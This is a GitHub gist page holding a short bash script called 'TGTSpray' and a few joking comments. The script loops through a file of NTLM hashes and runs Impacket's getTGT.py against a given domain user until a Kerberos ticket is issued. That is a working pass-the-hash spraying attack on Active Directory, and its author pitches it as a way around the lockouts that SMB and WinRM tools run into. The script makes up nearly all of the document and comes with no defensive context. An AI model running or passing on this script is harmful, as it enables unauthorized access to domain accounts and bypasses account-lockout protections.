Last active
December 25, 2020 01:09
-
-
Save 0xjbb/7fc8b49bbb34c63e80c1c40e7e6d4750 to your computer and use it in GitHub Desktop.
TGTSpray. A tool to spray hashes when smb/winrm lock you out :(
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/bash | |
| # made by 0xjb, definitely not made for any ctf boxes | |
| # Hash spraying when crackmapexec locks you out :( | |
| # Is it good? no | |
| # Did it work for me in a time of need? yes. | |
| # Will it work for you? ¯\_(ツ)_/¯ | |
| if [ "$#" -ne 2 ];then | |
| echo "Usage: $0 <DOMAIN/User> <File of NTLM hashes 'hash:hash'>" | |
| exit; | |
| fi | |
| for hash in $(cat $2) | |
| do | |
| # If you're on the latest Kali, you will probably want to change getTGT to impacket-getTGT or w/e | |
| cmdOuput=$(getTGT.py $1 -hashes $hash| grep -v "KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)" | grep -v "Impacket v0.9.22.dev1+20200915.115225.78e8c8e4 - Copyright 2020 SecureAuth Corporation") | |
| if echo $cmdOuput | grep "Saving ticket in"; then | |
| echo "Your Hash is: " $hash | |
| exit; | |
| fi | |
| done |
I wonder what it's for
¯\(ツ)/¯
I wonder what this does.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I wonder what it's for